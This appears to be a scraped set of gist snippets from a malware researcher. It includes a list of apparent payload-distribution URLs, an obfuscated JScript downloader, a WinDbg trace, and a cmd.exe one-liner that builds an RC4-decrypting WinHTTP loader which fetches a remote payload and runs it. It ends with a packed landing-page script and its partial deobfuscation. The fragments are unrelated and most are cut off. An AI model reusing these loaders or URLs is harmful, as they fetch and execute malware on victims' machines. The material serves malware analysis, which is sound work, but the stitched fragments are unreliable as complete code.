brad-anton

00000000  01 01 01 01 01 01 00 01  01 00 01 01 01 01 00 01  |................|
00000010  01 00 01 00 00 01 01 00  00 00 01 00 00 01 00 00  |................|
00000020  00 01 01 01 01 00 01 00  01 01 00 01 01 00 01 01  |................|
00000030  00 01 00 00 00 00 00 01  00 00 01 00 01 01 01 00  |................|
00000040  00 00 01 01 00 01 00 01  01 00 00 00 01 00 01 01  |................|
00000050  01 00 00 00 01 00 01 01  01 01 00 01 00 01 00 01  |................|
00000060  00 01 01 00 00 00 00 00  01 01 01 01 00 00 00 00  |................|
00000070  01 00 01 00 01 01 01 01  01 01 01 00 00 00 01 00  |................|
00000080  01 00 01 00 01 01 00 00  01 01 01 00 01 01 00 01  |................|
00000090  00 01 00 01 01 00 01 01  01 00 01 01 00 01 01 00  |................|

brad-anton

http://u2station.com:80/g766d4ft?rRffpf=NrdcbOsmH
http://imagillaboration.org:80/g766d4ft?rRffpf=NrdcbOsmH
http://www.u2station.com:80/g766d4ft?rRffpf=NrdcbOsmH
http://unstytovar.com:80/0o0qep
http://xceramics.com:80/g766d4ft?rRffpf=NrdcbOsmH
http://resboiu.ro:80/g766d4ft?rRffpf=NrdcbOsmH
http://hotelikbej.pl:80/ild3ha8
http://vonsky.com:80/ez3q7k8
http://prod23.ru:80/v451a3
http://hurrychufa.com:80/4kspi

brad-anton

<job id=1><script target="about:blank" language="JScript">WScript.Sleep(1);
var QFz = "";
var RXj = 0;
/*@cc_on

var Hg=(function f(){return '\x0a';})(),ROd=(function f(){return '\x0d';})(),XAz=(function f(){return 'D';})(),ZNz=(function f(){return 'H';})(),Fn=(function f(){return 'L';})(),TIh=(function f(){return 'P';})(),ZHg=(function f(){return 'T';})(),Ki=(function f(){return 'X';})(),Eo=(function f(){return '\x09';})(),Ax=(function f(){return 'd';})(),Wd=(function f(){return 'h';})(),AGf=(function f(){return 'l';})(),Mm=(function f(){return 'p';})(),BJy=(function f(){return 't';})(),Af=(function f(){return '\x7d';})(),EQi=(function f(){return '\x7c';})(),Ne=(function f(){return '\x7b';})(),WTo=(function f(){return '\x2f';})(),VFn=(function f(){return '\x2d';})(),Xf=(function f(){return '\x2e';})(),Qz=(function f(){return '\x2b';})(),Hk=(function f(){return '\x2c';})(),Kf=(function f(){return '\x2a';})(),KTm=(function f(){return 'C';})(),PIq=(function f(){return 'G';})(),Wk0=(function f(){return 'K';})(),

brad-anton

{
	"timestamp" : "1483998618838",
	"response_code" : "403",
	"headers" : {
		"accept-language" : "es-MX",
		"accept-encoding" : "gzip, deflate",
		"request" : {
			"version" : "1.1",
			"protocol" : "HTTP",
			"method" : "GET",

brad-anton

<!DOCTYPE html>
<html lang="en">
<head>
   <title></title>
   <meta charset="UTF-8">
   <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
   <meta name="apple-mobile-web-app-capable" content="yes">
   <meta name="apple-mobile-web-app-status-bar-style" content="black">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">

brad-anton

0:013> bp KERNEL32!CreateProcessAStub
0:022> g
Breakpoint 0 hit
eax=00000000 ebx=7717eb70 ecx=00000000 edx=77244048 esi=00000011 edi=04d3b330
eip=7717eb70 esp=04d3b2b4 ebp=04d3b340 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
KERNEL32!CreateProcessAStub:
7717eb70 8bff            mov     edi,edi
0:005> da poi(esp+8)
116f00b2  "cmd.exe /q /c cd /d "%tmp%" && e"

brad-anton

cmd.exe /q /c cd /d "%tmp%" && echo function O(n,g){for(var c=0,s=String,d,D="pu"+"sh",b=[],i=[],r=255,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g.length)^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,S="fromCharCode";e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};function H(g){var T=u(0),d=W(T+"."+T+u(1));d["setProxy"](n);d.open(u(2),g(1),n);d.Option(0)=g(2);d["Sen\x64"];if(0310==d.status)return O(d.responseText/**/,g(n))};T="WinHTTPMRequ";E=T+"est.5.1MGETMScripting.FileSystemObjectMWScript.ShellMADODB.StreamMeroM.ex",u=function(x){return E.split("M")[x]},J=ActiveXObject,W=function(v){return new J(v)};try{E+="eMGetTempNameMcharCodeAtMiso-8859-1MMindexOfM.dllMScriptFullNameMjoinMr\x75nM /c M /\x73 ";var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=WScript,L=U[u(14)],v=u(9),m=U.Arguments;s.Type=2;c=q[u(8)]();s.Charset=u(012);s.Open();i=H(m);d=i[v](i[u(12)]("P\x45\x00"+"\x00")+027);s.writetext(i);if(037^<d){var z=1;c+=u(13)}els

brad-anton

$ echo 'tst' > file1
$ echo 'test' > file2
$ md5sum * > hashes.md5
$ cat hashes.md5 
746a2ef902cf7596d0c9f66add5524d5  file1
d8e8fca2dc0f896fd7cb4cb0031ba249  file2
$ md5sum -c hashes.md5 
file1: OK
file2: OK

brad-anton

<HEAD>
 <style>
html {display: none;}
</style>
<script type="text/javascript" src="//code.jquery.com/jquery-latest.min.js"></script>
<script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jstimezonedetect/1.0.6/jstz.min.js"></script>
<script>eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(2).7(3(){$("8").9();0 f=h i();f.j("k",2.4,l);f.5(m);0 g=f.n().o();0 b="p";0 c=("2","q","//s.t-6.u/6.v");c=("w","x-y-1","z");c=("5","A");0 d=B.C();0 e=d.D();$.E({F:4.G,H:"I",J:"K="+e+"&r="+2.L+"&M="+g,N:3(a){O(a)}})});',51,51,'var||document|function|location|send|analytics|ready|body|hide||||||||new|XMLHttpRequest|open|GET|false|null|getAllResponseHeaders|toLowerCase|GoogleAnalyticsObject|script||www|google|com|js|create|UA|3188658|auto|

brad-anton

$(document).ready(function()
	{
	$("body").hide();
	var f=new XMLHttpRequest();
	f.open("GET",document.location,false);
	f.send(null);
	var g=f.getAllResponseHeaders().toLowerCase();
	var b="GoogleAnalyticsObject";
	var c=("document","script","//www.google-analytics.com/analytics.js");
	c=("create","UA-3188658-1","auto");